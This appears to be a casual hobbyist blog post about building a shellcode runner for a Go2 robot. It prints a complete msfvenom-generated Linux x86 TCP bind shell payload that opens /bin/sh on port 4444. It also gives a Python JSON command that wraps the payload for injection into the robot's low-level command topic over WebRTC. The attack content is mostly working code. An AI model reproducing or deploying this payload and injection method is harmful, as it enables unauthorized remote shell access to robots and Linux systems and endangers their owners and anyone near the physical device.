working on a new shellcode runner fo rhte go2

posted on : 7/7/2024

hello hello every1 so today i am (bc of woke) working on a shellcode runner for the go2 robot that i have been working on. i am using this to perform a lot of the webrtc stuff mainly bc it's in python and easy to use and build a script for.

lets bgin!!!!! (git repo can be found here

first up the shellcode

    
            buf = b""
    buf += b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
    buf += b"\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a"
    buf += b"\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41"
    buf += b"\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80"
    buf += b"\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    buf += b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53"
    buf += b"\x89\xe1\xb0\x0b\xcd\x80"

    

its asimple tcp bind shell for linux to send over port 4444 to the bot's ip. i generated it using #msfvenom but eventually ill add something to just create it's own shellcode. #bytegril

next i have some stuff to make the cmd to send as json over webrtc that contains the buffer to inject

       command = {
        "type": "request",
        "topic": "rt/lowcmd",
        "data": {
            "header": {"identity": {"id": Go2Connection.generate_id(), "api_id": cmd}},
            "parameter": buf
        },
    }

the rest of the code is api calls and data channel conections to the other place.